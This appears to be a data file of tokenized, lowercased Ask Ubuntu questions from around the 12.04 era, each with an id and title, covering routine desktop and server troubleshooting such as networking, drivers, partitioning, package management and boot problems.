178674	windows network missing from nautilus after reboot	when i first installed ubuntu 12.04 , my nautilus browser included a `` browse network '' section which included icons for the two windows 7 pcs in the household . since then , nothing has changed on either the windows or the ubuntu end , with the exclusion of me installing google chrome off a .deb file . now , the two pcs are missing from the nautilus `` browse network '' section . in their place is a generic `` windows network '' icon . when clicked , after a long delay , it sends back an error message : unable to mount location dbus error org.freedesktop.dbus.error.invalidargs : mountpoint already registered having ubuntu provisioned on this laptop for less than 72 hours , it was a surprise to see it automatically provision the windows network . i seem to recall ubuntu a few years ago requiring me to install samba and do some pretty heavy ( for me ) configuration ; and still the support was pretty dodgy . does ubuntu just come with samba installed and configured out of the box , or was something else going on ? what could have caused the pc discovery to fail , and what should i do to remedy it ?
178675	changes are persistent on a bootable usb flash drive ?	i consider to create a bootable pendrive with ubuntu 12.04 lts . i wonder if all changes that will be made are persistent ? if i install an application , will it be also available after os reboot ? will my files stay intact ?
178677	how to keep volume optimum irrespective of bitrate ?	i am using vlc media player on ubuntu 12.04 . a few videos having high bit-rate play sound very loudly . to an extent i feel that it may affect my speakers . some references : http : //superuser.com/a/337277/152615 http : //www.tomshardware.com/forum/80989-35-does-media-player-damage-speakers what should i do to keep sound to an optimum ? if i lower the system volume . for few videos , i need to increase the sound to make it audible . is there a way to keep sound to a fixed level , irrespective of video or audio quality ( or bit-rate ) ?
178678	how to get rid of i386 libs ?	yesterday , i tried to install the ubuntu 64bit package for netviewer . this package seems to be a big mess as it is not really a 64bit version of the app , but instead uses wine to get it to run . along with the install , it installed thousands : - ) of i386 libs . how do i get rid of them ? more precisely , can i somehow see which libs were installed yesterday ?
178684	unable to see 12.04 upgrade listed in update manager	i am not seeing 12.04 lts available for update in update manager . i followed the update instructions , and set to lts release only . when on normal release , i see only 10.10. i wish to upgrade to 12.04 lts . what am i missing ? my data is backed up , but i have at least 2 yrs of programs installed and i would not like to lose all those programs and configs for various services and such . otherwise i would do a clean install . suggestions ? or more specific instructions please . thanks . pete
178686	can i set superuser inside the launcher ?	i have a script that i run every time i boot up my laptop ( to reset the screen brightness ) . i would like to be able to execute this command using a launcher : echo 1500 > /sys/class/backlight/intel_backlight/brightness unfortunately , in order to execute this command ( to edit the file ) i need to be su and type in my username and password . i know that unix shell scripts are designed such that you ca n't enter interactive variables like this , but i was hoping the launcher would have more functionality . is it possible to enter interactive arguments like superusername and password in the launcher ? if so , how ?
178694	what does it mean `` processing triggers for ... '' after installing/uninstalling ?	when i uninstalled a deb package i get this : processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... do i need to do anything ?
178695	is there any project in existence to have common ( all apps ) settings ?	is there any project in existence that shall bring all the settings of all apps under one window . somewhat like what exists in ios.something like this - also , is there any such thing in existence that shall make apps compulsory to have settings ... atleast minimal . and then these settings be combined in one single settings app.may be an app settings included in our normal systems settings window.. if there is no such project in existence , i would like to suggest this feature for ubuntu. ! thankyou : ) a community answer would be nice !
178696	which dot matrix printer is recommend for ubuntu ( 10.04 or + ) ?	i need to buy a better dot-matrix printer and i am currently using the epson lx-300 ( like ibm pro printer ) i found in resellers : epson lx-300 ii , fx-890 , fx-2190 , lq-2090 oki ml1120 , ml320 , ml620 , ml621
178697	how do i find matching filenames in a directory listing ?	i have bunch of iso images in my hdd and i have their whole content listed inside a text file in the following format : < immage > .iso , < dir structure > / < filename > . < extension > example : os backups.iso , ­ubuntu-­12.­04-­desktop-­i386.­iso os backups.iso , xubuntu-12.04-desktop-i386.iso os backups.iso , background/pictures.jpg pictures vacation 2011.iso , documents/cost_estimates.xls pictures vacation 2011.iso , italy/img1.jpg pictures vacation 2011.iso , italy/img2.jpg now i want to issue a grep command against that text file to find files that contain `` pictures '' in their names . the expected result would be ( for the previous example ) : pictures vacation 2011.iso os backups.iso , background/pictures.jpg any ideas on how to accomplish something like this using grep ? alternatives ? thanks !
178698	connecting to a cisco router via serial	i 'm not quite sure if i worded the title correctly , but here 's my issue : i want to connect to a heavy duty cisco router ( not quite sure what model , but its an older one ) using a usb to serial adapter on my linux netbook . the netbook has a few usb 2.0 ports and a 10/100 ethernet port . i plugged the adapter in , loaded the modules for it , opened up putty , configured the baud rate , flow control , told it to use /dev/ttyusb0 , etc ... pressed connect , and ... ... ... . nothing . i found a thing saying to use `` sudo screen /dev/ttyusb0 '' but that did n't do squat . i even tried a total shot in the dark by plugging the rollover cable directly into my rj-45 port and sending the putty connection through eth0 ( though i was posative that was n't going to work , and it didnt ) . any ideas to get my linux book connected to the cisco routers ?
178708	is it better to host a minecraft server on ubuntu desktop , or ubuntu server ?	i want to know because i hear linux runs servers better then windows and im not sure if i need ubuntu desktop or server for it to run the server nice . system specs : intel core i3 dual-core 3.30 ghz , 8gb ram , 1 tb hdd
178712	how to increase swap space ?	i have , by default , 250mb of swap space in ubuntu , and i want to expand it to a larger size . i need 800mb , which i think will be enough to open several applications without having to hit the current limit of swap . i hope someone can help me .
178713	is wubi reliable under windows 7 service pack 1	i am trying to get information in order to eliminate possible sources for a problem i am having , as described in another question . can anybody confirm that ubuntu ( either iso install or wubi ) works reliably as a dual boot on a system running windows 7 service pack 1 . i have another system running win 7 ( not sp1 ) that works great , but windows seems to be corrupting the ubuntu file system , and i would like to rule out the sp 1 as being the problem . otherwise , i am considering reinstalling windows using a pre-sp1 install disk , since i know that a computer installed from this disk works well with ubuntu . see my other question for more info : windows kills ubuntu thanks guys !
178721	why does wifi work with wicd but not network manager	so my wifi can connect with wicd , but not the default kde network manager . i would like to know why . do both these applications handle the connection differently ? if so what would the difference be ? my hardware is a broadcom 4313 . i 've tried the sta drivers and the open source drivers , and a few other options with network manager . none of which worked . in fact , everything was working fine for a while , just that one day , it did n't . i ca n't identify what i did to trigger this issue though . and to be more specific : even with network manager , i could connect to open connections ( the ones without a password ) , i can connect to wpa connections , just not to one particular wep .
178722	what is the status of ubuntu mobile ? is the project expected to reinitiate in coming years ?	with android and google play becoming so popular , it would be great to have ubuntu on mobile devices again . some archaic references : http : //blog.canonical.com/2008/06/24/ubuntu-mid-edition-804-achieves-its-first-public-release/ https : //wiki.ubuntu.com/mobileteam/mobile ? action=show & redirect=mobileandembedded
178728	why does my ubuntu screen sometimes tile up when i run a program	this is a pic of the issue . sometimes when i run a program usually my screen tiles up and as time goes on it will get worse to the point where i can not see whats being displayed on my screen . it has been going on every time i open up a new window . can this be resolved or am i just going to have to live with this annoying bug ? i love linux and i want to get this problem resolved . if anyone could help i would appreciate it very much .
178732	can i change my devices from for example sda1 to sda2 ?	i want to change the numbers of my partitons . i want to change /dev/sda1 into /dev/sda5 and /dev/sda5 into /dev/sda1 . i hope someone can help me to change it . thanks : )
178733	how do i start tomcat on boot without having to provide a root password ?	i have tomcat set up to launch at start up on my ubuntu box . trouble is , i have to manually supply a root password on each boot . is it possible for this to be automated ? do i just supply an command parm ? if so , what is the syntax ? thank you !
178734	upgraded to 12.04 and now the wifi applet does n't show wireless connections to connect to	i upgraded ubuntu to 12.04 and everything is fine expect i now have no option to connect to wifi . under the wifi applet in the upper top right where i would typically open the applet and see wifi signals that the computer finds and that i can connect to , when i open the applet there are no wifi signals listed to choose from . it shows from top to bottom in white text : vpn connections , enable networking and edit connections ; it shows in dark text that i ca n't open : wired network , disconnected and connection information . any ideas what to do ? basically the computer software does n't show the option of connecting to the wifi now .
178736	generate mp3 file from espeak	i 'd like to convert an text file to an mp3 file using espeak . is it possible to do this ? i 'm trying to use espeak to create a song synthesis shell script that can convert text to a song .
178737	using apt-get from iso on vmware	i 'm trying to install vlan using apt-get but i get this error : e : unable to locate package vlan i 'm not connected to the internet at the moment as i need to tag my ubuntu server to the vlan first . i 've installed ubuntu on vmware using an iso file . is there a way i can install applications using apt-get from the iso file ?
178748	ubuntu tweak in lubuntu	i am new , but not all that new to linux , i run zorin 5.2 core on one machine . i have an older milwaukee pc , 2001 , xp computer , replaced foxconn motherboard , original pentium 4 1.6 ghz processor , upgraded to 1.256 gb of ram , and 40 gb hard drive . i have installed lubuntu 12.04 with the lxde desktop on ( xp is gone forever ) on this older computer . i really like the os for its lightness and speed . i am familiar with ubuntu tweak from zorin . i want to know , is it wise to install it on lubuntu , as it is a lightweight distro ? i like tweaks ability on zorin , but am not sure it would be wise to have on lubuntu ? i already have a tutorial on how to install it on ubuntu if it is not there . anyone try it on lubuntu ? is it worth the trouble , or does it eat up to many resources ? please let me know if you have any experience with this program in lubuntu as it is not a default program . i think it would be a great addition to my machine , if it works as well as with ubuntu and zorin .
178750	trouble installing package and updating	i almost nothing about ubuntu . when i try to run the command to install of a package , i am said that 'unable to locate package' when i try to run sudo apt-get update , the system seems being blocked ! here 's what i get : does anybody has an idea ?
178751	accidentally deleted tmp folder	i was trying to run sudo rm -r ./tmp but instead typed sudo rm -r /tmp will it be fixed by running ? sudo mkdir /tmp if i do what permissions should i give it ? ps : i didnt log out of my system yet
178757	eog random slideshow from the terminal	what is the best way to have eye of gnome graphics viewer ( eog ) open a folder full of images in a randomized slide-show from the terminal ?
178758	method to query the package database in a case-insensitive manner ?	i have the name of a file and i need to determine what package provides it . if it were n't for the fact that i need to perform a case-insensitive search , the following command would work fine : dpkg -s filename.txt this works great if the file is named 'filename.txt ' but not if it is named 'filename.txt ' . consulting the manpage for the dpkg command does n't reveal anything about a case-insensitive option for the command and i 'm left in the dark . is there a way to query the package database for a certain file in a case-insensitive manner ?
178759	updater crashed while `` waiting for configuration file prompt ''	updater asked about a configuration file change . i clicked to see the differences , but that operation crashed . now i am left half-way through an update , with a box saying waiting for configuration file prompt and no way to give it the reply it is waiting for . what do i do now ? if i kill the updater , will i end with a broken system ( half updated ) ? help please .
178764	nvidia geforce gtx 460 1gb keeps crashing	my nvidia geforce gtx 460 1gb keeps crashing my whole system while playing 3d games . i installed the latest drivers and nothing has been fixed . is this a problem with all nvidia drivers and there is something your meant to disable ? the only thing i can provide for possible debugging is that when playing hd videos through vlc or smplayer ( system can also crash while playing in smplayer ) the video lags and the sound is prickly but while playing the same videos in mplayer it works fine . smplayer uses mplayer to play its videos so i can only think its a setting that 's causing all this to happen . even when i play a video through smplayer but have the setting to use a mplayer window i get the same result . i have ubuntu 12.04 by the way . vromoth
178766	how do i make the scanner function of my hp photosmart d110 work ?	i recently switched from windows to ubuntu and my all in one print/copy/scanner can only print now . i want to scan some documents .
178767	fixed resolution	when i start apps that change my screen resolution , it keeps unchanged after exiting the app . ( games in wine , some linux games : world of goo , enemy territory ) also sometimes i can see the panels and those made weird resolution ( 1440*8xx ) . then i have to get the resolution back to native every time i close an app . can i fix the desktop resolution not to be attracted by the apps ? in enemy territory i have another problem , changing resolution moved my screen so i couldnt see anything , only a part of the wallpaper . i cant play et on native resolution because it goes over the size of my monitor .
178771	ubuntu 12.04 flush-encryptfs resource hog	i 've been using ubuntu 11.10 for a while , but recently upgraded to a fresh install of 12.04 lts . i am noticing a program called flush-encryptfs- using a significant portion ( 30 to 80 % ) cpu resources . it seems to start running when i launch chrome . if i close chrome , it will eventually stop . this is having a huge impact on system performance . what is flush-encryptfs- ? what is it doing ? how can i stop it ? i am using an asus eee pc netbook . it 's a new install of 12.04 with very few additional programs installed and yes i encrypted my home folder .
178772	ubuntu 12.04 lts boot problem - ( wo n't startup after install )	i installed 12.04 64-bit on my new pc . the installation says its completed , i got the cd out of the pc and then when it restarts it just goes to a purple screen and stays like that forever . i ca n't even get to the login screen . when i boot from ubuntu installation cd there 's no recovery mode option . what can i do ? please help . my pc is : asus m5a97 amd fx6100 8 gb ram ati radeon 6670
178773	is there a way to see what exactly the `` processing triggers '' does per-package basis ?	as i 've understood , the usual `` processing triggers for < packagename > '' does some package- and system-specific tasks such as add items to a launch menu or update a configuration file . is there an actual way to see what exactly is being done or altered during this step ? where can one find the exact behaviour of the step ?
178774	can i get network manager to unload/load the wireless driver ?	sometimes my wireless loses connection and will not reconnect . however , i find it will reconnect when i open terminal and run sudo modprobe -r nameofdriver sudo modprobe nameofdriver however , going to network manager and un-checking enable wireless and enable wireless does not fix the problem . is there any way to have network manager remove the driver via modprobe ? what exactly is disabling in network manager ( or with the hardware/keyboard switch ) do ?
178775	i have bought a new wireless card and i have the same problem , it connects then it is n't able to browse anything	i can connect with wired connection in my living room but i ca n't with my wireless card . i 'm pretty sure card is ok because i got a new one and driver works fine . i had ubuntu 12.04 then i downgraded it to 11.10 and i have the same problem over and over again . i searched all over the forums and i ca n't find an answer . ifconfig : eth0 link encap : ethernet hwaddr 40:61:86:35:11 : b0 inet addr:192.168.2.6 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :4261:86ff : fe35:11b0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4096 errors:0 dropped:0 overruns:0 frame:0 tx packets:3930 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3959080 ( 3.9 mb ) tx bytes:591022 ( 591.0 kb ) interrupt:43 base address:0x6000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:32 errors:0 dropped:0 overruns:0 frame:0 tx packets:32 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2528 ( 2.5 kb ) tx bytes:2528 ( 2.5 kb ) wlan0 link encap : ethernet hwaddr f8 : d1:11:12 : af:79 inet addr:192.168.2.5 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :fad1:11ff : fe12 : af79/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:50 errors:0 dropped:0 overruns:0 frame:0 tx packets:188 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4872 ( 4.8 kb ) tx bytes:30698 ( 30.6 kb ) nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : 40:61:86:35:11 : b0 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.2.6 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.2.1 dns : 192.168.2.1 - device : wlan0 [ bitches ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : ath9k_htc state : connected default : no hw address : f8 : d1:11:12 : af:79 capabilities : speed : 7 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *bitches : infra , cc:5d:4e : dd:33 : d0 , freq 2417 mhz , rate 54 mb/s , strength 100 wpa wpa2 *hteronet : infra , cc:5d:4e : dd:33 : d0 , freq 2462 mhz , rate 54 mb/s , strength 59 wpa wpa2 ipv4 settings : address : 192.168.2.5 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.2.1 dns : 192.168.2.1
178779	how do i find out which program is associated with a unity launcher icon ?	the title is very self-descriptive . i find it completely unintuitive that i ca n't access such important information simply via right-clicking on the program icon on the unity launcher . since that 's not the solution , i 'm completely clueless how to figure out which exact program is being launched by some icon in the unity launcher . there must be a simple way , but how ?
178785	12.04 amd64 desktop installation hangs	i am trying to install 12.04 amd64 destop on a fresh hardware ( ga-a75n-usb3 , a8-3870k , samsung ssd , install from usb-stick . the installation shows `` ubuntu '' and some dots below . the mouse pointer disappears and comes back after a minute . then the pc hangs at this point . i tried acpi=off noapic in the command line . the pc then stops with the last line : '' probing pci ... '' i installed the alternate amd64 . ok so far but how to update to a full installation ? how can i find out what make my pc hang ? many regards
178786	creating an ubuntu live usb for use with gparted	i 've install ubuntu 12.04 on my windows 7 dell laptop . recently i discovered that i 'm running out of space on my ubuntu partition , and i would like to enlarge it . is it safe to resize partitions while they 're in use e.g . when i 'm logged into ubuntu ? if so , i 've ran into this problem when i run gparted : it seems as if my hard drive is one big , ntfs partition , like the ubuntu partition does n't exist . is it possible ubuntu runs off the ntfs partition , sharing it with windows ? what should i do ?
178788	how to obtain .rej file from debuild ?	i 'm using debuild with some quilt patches provided , and one of them is failing to apply . it says it makes a rejects file - however there is no such file actually made . how can i retrieve to look at it and figure out what is wrong ? dpkg-source : info : using source format `3.0 ( quilt ) ' dpkg-source : info : building mudlet using existing ./mudlet_2.0-rc12.orig.tar.gz patching file src/src.pro hunk # 1 failed at 8 . hunk # 2 succeeded at 27 ( offset 1 line ) . hunk # 3 succeeded at 243 ( offset 3 lines ) . 1 out of 3 hunks failed -- saving rejects to file src/src.pro.rej dpkg-source : error : lc_all=c patch -t -f 0 -n -p1 -u -v never -g0 -e -b -b .pc/project_file/ < mudlet-2.0-rc12.orig.s5vaub/debian/patches/project_file gave error exit status 1
178793	why does pidgin refuse to connect to facebook chat ?	i have searched around the net for a solution to my problem . i gave myself an account user name for facebook so i could use the chat in pidgin 2.10.3 . however , no matter what i do , pidgin refuses to enable the account and it gives me the same message : username @ chat.facebook.com/pidgin disabled not authorized i used the tutorial on at this blog : http : //poppleit.com/how-to-howto-use-facebook-facebookchat-facebook-chat-with-pidgin-instant-messenger-14-07-2012/ # comments
178801	ca n't see files in ubuntu one web interface , just in android , and in the sync folder	i think there is some screen-shots or some documentation missing otherwise , as i 've been using u1 , for a week or so but i 'm not quite sure it is working correctly . this is the thing . i copied ( using xp ) my files to the directory that was setup to hold my files synced , but i ca n't see any file on the web interface of one.ubuntu.com . is n't it supposed to show the filenames that are currently stored ? on the desktop application , it shows 192 mb used , but not a single file is shown online . i 'm a newbie at this , that i do n't know if i 'm getting right the purpose of u1 . also , i have spent some quality time reading this site , but sometime gets so damn technical , that it certainly discourages any further intent to get it right . would like to see some kind of documentation aimed to really newbie users and the screen-shots , really , believe me , can help a lot users in my situation .
178802	restart service that manages `` windows share '' folders	i connect from ubuntu 12.04 to a windows 7 on another computer connected to the lan using nautilus > file > connect to server . most of the time it works fine , but sometimes when i open it and try to open the windows `` users '' folder ubuntu opens it ( or try to because it hangs ) with a text editor . i tried right clicking the folder and `` open with files '' but it still open a text editor . if i restart ubuntu it works again . so i was wondering is there a service or something i could restart to fix this issue without restarting the computer ? services status : root : ~ $ service -- status-all [ ? ] acpi-support [ ? ] acpid [ ? ] alsa-restore [ ? ] alsa-store [ ? ] anacron [ - ] apparmor [ ? ] apport [ ? ] atd [ ? ] avahi-daemon [ ? ] bluetooth [ - ] bootlogd [ - ] brltty [ ? ] console-setup [ ? ] cron [ ? ] cups [ ? ] dbus [ ? ] dmesg [ ? ] dns-clean [ ? ] failsafe-x [ - ] fancontrol [ ? ] friendly-recovery [ - ] grub-common [ - ] hddtemp [ ? ] hostname [ ? ] hwclock [ ? ] hwclock-save [ ? ] irqbalance [ - ] kerneloops [ ? ] killprocs [ ? ] lightdm [ - ] lm-sensors [ ? ] modemmanager [ ? ] module-init-tools [ ? ] network-interface [ ? ] network-interface-container [ ? ] network-interface-security [ ? ] network-manager [ ? ] networking [ ? ] nxsensor [ ? ] nxserver [ ? ] ondemand [ ? ] openvpn [ ? ] plymouth [ ? ] plymouth-log [ ? ] plymouth-splash [ ? ] plymouth-stop [ ? ] plymouth-upstart-bridge [ ? ] pppd-dns [ ? ] procps [ - ] pulseaudio [ ? ] rc.local [ ? ] resolvconf [ ? ] rfkill-restore [ ? ] rfkill-store [ - ] rsync [ ? ] rsyslog [ + ] saned [ ? ] sendsigs [ ? ] setvtrgb [ ? ] speech-dispatcher [ + ] ssh [ - ] stop-bootlogd [ - ] stop-bootlogd-single [ ? ] sudo [ ? ] udev [ ? ] udev-fallback-graphics [ ? ] udev-finish [ ? ] udevmonitor [ ? ] udevtrigger [ ? ] ufw [ ? ] umountfs [ ? ] umountnfs.sh [ ? ] umountroot [ - ] unattended-upgrades [ - ] urandom [ ? ] virtualbox [ ? ] whoopsie [ - ] x11-common
178804	wireless network in virtualbox	i just installed my first ubuntu server ( 12.04 ) instance and immediately ran into the following problems : running apt-get install or update fails ( see below ) running ifconfig produces peculiar ip addresses starting with 10.x.x.x and my router does not see the server at all in its `` attached devices '' page ( its a consumer grade netgear ) when i run apt-get i get 50+ of the following errors : failed to fetch & lt ; some-http-url > . temporary failure resolving & lt ; blah > .ubuntu.com i read up on this error for 12.04 , and found some similar posts on this forum and on server fault that recommended going into /etc/resolv.conf and adding an entry : nameserver 8.8.8.8 to my surprise , i found that /etc/resolv.conf was a symlink pointing to somewhere else and i had to delete it first , then create a new one with the entry indicated above . i restarted the server and tried running apt-get again , same results . how do i start diagnosing the problem ( i 'm a relatively new linux/ubuntu user ) ? additional details that may help : this is actually a virtual machine running as a virtualbox guest os the physical host that is running this vm is my laptop which has a wireless connection ; i 'm wondering if ( somehow ) the laptop is getting the network wirelessly , but perhaps either the vbox vm and/or the ubuntu server os is n't configured for wireless and so nothing is `` getting through '' ? thanks in advance for any pointers ! edit : here is a snapshot of my vm 's network settings ( only adapter 1 has any information populating its fields , so i assume my vm has only 1 adapter ) : here is the output when i run ifconfig from the terminal : and here is the output when i run route from the terminal : running ping google.com :
178806	where do packages installed/upgraded with apt get stored ?	as time goes by we tend to do apt-get install and add or replace software . are these archived in some form or do they get auto-cleared after installation ? and if it does n't get auto-cleared , it would mean that a clean up is needed , is n't it ? finally , if they 're not auto-removed , can we reuse these packages on different machines ?
178809	compressing a list of files by using tar	what i am trying to do is to compress a list of files using tar . so what i am doing is sudo tar -pcf filename.tgz `cat filename.list` so if there is a directory on the list like this /home/vmuser/.gconf tar compresses everything in that folder . however what i want is to just add exactly whatever is on the list .
178817	how do i restore the default quicklists ?	just me with another question . i recently reinstalled ubuntu ( i had been using kubuntu for a while but could n't quite get used to it ) , however after reinstallation i found that my home folderâs quicklists are missing . it only shows ubuntuone , the rest of my home folder entries are missing . as i recall , it used to display documents , downloads , music , etc.. how do i go about restoring these quicklists ? ? thank you all in advance for your replies .
178820	how to enable app menu in vlc ?	call it a minor annoiance , but i 'd really like if vlc used the app menu instead of displaying it in the main window . is there a way to correct this behavior ? i do n't really know if this would require patching vlc or if it 's something that could be enabled with a plugin . extra points if you can provide me more info on this .
178824	detecting packages that i am not using to uninstall them	i 've been using ubuntu for almost four years now . i am pretty sure there are many applications and packages i never use ( like empathy , for example ) and i would like to know which ones they are . is there any way to know which applications or packages are used very seldom ( or never ) so i can get rid of them ? tx .
178825	screen tearing while browsing the internet ( chrome+firefox ) in ubuntu 12.04 intel 4000 graphics	first , some specs : ubuntu 12.04 on an asus ux31a zenbook prime , running kernel 3.5.0-10 . as stated in the title , intel 4000 graphics . while browsing the internet in both chrome and firefox , i get really bad screen tearing . it seems to happen the worst on gmail , and when opening drop-down menu 's . also happens on youtube when you drop down the little description thing . it causes screen tearing and a lot of blank spaces that sometimes will reappear if you move the mouse over them . the strangest thing about it is that i do n't get any tearing at all while streaming videos . only while doing general browsing . now that i am actually typing it out it sounds like it could be a javascript problem . who knows ? hopefully one of you do .
178832	how to reinstall apps ?	i am having trouble re-installing create launcher . i downloaded it two days ago but my ubuntu was acting weird . because i am new to linux/ubuntu , i un-installed it and re-installed it . i am trying to get create launcher back . i did the troubleshoot method of adding the deb line into the update manager under the other software tab but it comes up with an error . if someone could give me a step by step way of reinstalling it , i would appreciate it .
178833	scanner detected with sane-find-scanner , but not with scanimage -l or sudo scanimage -l	i have a fujitsu scansnap s1300i . i compiled sane from source . when i run sane-find-scanner , the following output is given : sane-find-scanner will now attempt to detect your scanner . if the result is different from what you expected , first make sure your scanner is powered up and properly connected to your computer . no scsi scanners found . if you expected something different , make sure that you have loaded a kernel scsi driver for your scsi adapter . found usb scanner ( vendor=0x04c5 , product=0x128d ) at libusb:002:004 your usb scanner was ( probably ) detected . it may or may not be supported by sane . try scanimage -l and read the backend's manpage . not checking for parallel port scanners . most scanners connected to the parallel port or other proprietary ports ca n't be detected by this program . you may want to run this program as root to find all devices . once you found the scanner devices , be sure to adjust access permissions as necessary . however , when i run scanimage -l or sudo scanimage -l the following output is given : no scanners were identified . if you were expecting something different . check that the scanner is plugged in , turned on and detected by the sane-find-scanner tool ( if appropriate ) . please read the documentation which came with this software ( readme , faq , manpages ) . also , i added an entry to /etc/sane.d/fujitsu.conf for the scansnap s1300i .
178834	ubuntu 12.04 crashes when using youtube	ubuntu 12.04 crashes when i use youtube . the screen goes black with a lot of numbers , for example [ 780.768026 ] or [ 420.620022 ] . the numbers are always different . can anyone help me ? i have tried reinstalling , and that has n't helped .
178843	theming documentation for gnome shell	does anything like this exist ? i started modifying the gnome-shell.css file and noticed some none w3c standard attributes in there . anyone know where i can find some info about it ? also is there an application/helping tool that contains gnome-shell elements ( so i can see my changes easily )
178844	my dell inspiron 1501 wont connect to any network ( wireless or wired )	i just recently installed ubuntu 12.04 , replacing windows vista on my inspiron and it wont connect to the internet by any means . it wo n't detect any wireless networks and when i try the ethernet cord , i can see `` wired connection 1 '' in the network manager but the symbol on the panel is a wireless signal with 0 bars . furthermore when i open firefox , it says there is n't a connection . what should i do ? ( not an answer ) ok so i 've entered the required information , and changed the router settings so that it uses a static ip . still the inspiron refuses to recognize the connection . when i pull up the network manager , the only connection i see is `` wired connection 1 '' but it says it was last used one day ago even though i currently have it plugged in . it 's like the computer does n't even recognise the attached ethernet cord .
178845	i need help with disk partition	i have installed ubuntu 11.10 on a machine running windows 7 starter . while installing , i chose the 30 gb installation option which seemed like the largest installation offered . i am unable to use the other 250 odd gb on my hard drive . i am aware of disk utility available through the dash home , but unsure how to use it . i am also unable to find/create a mount point for the windows network accessible through the home folder . i 'd like to continue running windows , but apportion no more than 50 gb of space and use the rest for ubuntu . i 'm using a toshiba nb520 netbook . can someone help ? /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe7763813 device boot start end blocks id system /dev/sda1 * 2048 3074047 1536000 27 hidden ntfs winre /dev/sda2 3074048 609882111 303404032 7 hpfs/ntfs/exfat /dev/sda3 609882112 625141759 7629824 17 hidden hpfs/ntfs
178849	gnu backgammon does not play sounds	i installed gnu backgammon 0.90.0 , on kubuntu 12.04 . the graphics work perfectly , but there is no sound , even though enabled in the settings . is this a settings or compatibility issue or is it a bug i should file ? how to fix this ?
178850	how do i completely remove ubuntu/grub and replace it with the windows 7 bootloader ?	i installed ubuntu successfully by using acpi=off and nolapic . when i booted into the installed operating system , all that the screen showed was several multi colored bars ( this must have been my 10,000th installation attempt . ) i decided to get rid of ubuntu by simply deleting the partition and re-partitioning it as a blank drive . this caused an error on boot . error : unknown filesystem . grub rescue > i reinstalled ubuntu so i could get grub working again and boot into windows 7 , but i want grub and ubuntu gone for good . i am running the msi gt683dx with intelcore i7-2670qm nvidia gtx 570m / 1.5 gddr5 750gb hdd 7200 rpm 12gb of ddr3 ram i also ran the windows startup repair tool several times . i can not access my full ubuntu installation ( although i can get to a terminal through live usb i would prefer to just solve this in windows ) . i tried to run sudo apt-get install boot-info-script but i get ubuntu @ ubuntu : ~ $ sudo apt-get install boot-info-script reading package lists ... done building dependency tree reading state information ... done e : unable to locate package boot-info-script this is the output i get from 'fdisk -l' ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x9401091d device boot start end blocks id system /dev/sda1 2048 23207935 11602944 27 hidden ntfs winre /dev/sda2 * 23207936 23412735 102400 27 hidden ntfs winre /dev/sda3 23412736 888453119 432520192 7 hpfs/ntfs/exfat /dev/sda4 1449523198 1465147391 7812097 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 1449523200 1465147391 7812096 83 linux disk /dev/sdb : 16.0 gb , 16008609792 bytes 255 heads , 63 sectors/track , 1946 cylinders , total 31266816 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 32 31266815 15633392 c w95 fat32 ( lba ) partition 4 is 276gb of unallocated space . sda5 is obviously the ubuntu installation . i did not use a swap space partition because i only installed ubuntu so i could boot into windows . sda1 is the recovery i believe .
178851	is there a workable wallet program for ubuntu 12 ?	i read kwallet will not load in ubuntu 12 is there another wallet program or a work-around ?
178853	how can i upgrade ubuntu 8.10 to 12.04 ?	i 'm using ubuntu 8.10 as my server . this is old server but now i want to upgrade to 12.04 few website are hosted in this server . now my question is if i upgrade this server to latest did i 'll lost my data . php and mysql is running on this server . when i run apt-get update it show me errors : http : //paste.ubuntu.com/1160318/
178858	unity performance issue in 12.04	i 'm running an up to date 12.04 . been using it since it came out and only since the past week or so i 've come into an odd problem . the unity launcher is starting to act odd . when i hover over the firefox icon for example , normally the black tooltip bubble saying firefox web browser will pop up instantly , but lately it wo n't show at all or will come in showing only half of it . so i have to move my mouse away from the icon then back to it and the black tooltip will show like it should . this happens randomly , most notably when i first log in , but also it happens frequently during normal usage . it can happen when i have a few apps open or none at all . i have n't had this issue until recently , perhaps an up date cause it is my guess . i 've tried taking a screenshot of it , but as soon as i press print screen it goes back to normal . any thoughts on this issue ? i 'm using an asus u56e 6gb memory w 2.4ghz intel core duo with 12.04 32-bit thanks for any help in advance .
